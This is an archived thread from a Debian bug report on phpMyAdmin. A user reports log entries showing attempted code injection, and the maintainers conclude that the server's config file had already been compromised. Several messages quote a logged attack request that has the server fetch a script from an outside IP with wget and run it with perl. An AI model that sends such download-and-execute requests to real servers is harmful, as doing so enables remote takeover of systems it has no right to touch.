Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Michal Čihař
Hi Dne Mon, 29 Jun 2009 14:07:50 +0200 Thijs Kinkhorst napsal(a): > Ah right. I don't think there's a way we can realistically do anything about > an already-compromised installation. That is a general truth for any > vulnerability: how can we know to what extent the attacker has influenced th

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
On moandei 29 Juny 2009, Michal Čihař wrote: > No, in the log, he is using exploited config file (with some custom > code inside). Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Michal Čihař
Hi Dne Mon, 29 Jun 2009 13:39:19 +0200 Thijs Kinkhorst napsal(a): > Right, but the reporter is basing his report on the presence of log lines > trying to exploit the original issue. Which should not be possible anymore. No, in the log, he is using exploited config file (with some custom code i

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
On moandei 29 Juny 2009, Michal Čihař wrote: > > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET > > > //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O% > > >20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null& > > > > > > It seems PHPMyAdmin shipped with Lenny is still v

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Michal Čihař
Hi Dne Mon, 29 Jun 2009 10:58:18 +0200 Thijs Kinkhorst napsal(a): > Hi Laurant, > > > After looking at my logs, I did notice a lot of attempts to break in > > phpmyadmin through the following kind of url: > > > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET > > //phpmyadmin//config.inc.ph

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
Hi Laurant, > After looking at my logs, I did notice a lot of attempts to break in > phpmyadmin through the following kind of url: > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET > //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t >mp/50.txt;perl%20/tmp/50.txt%20%3

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Laurent CARON
Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET //phpm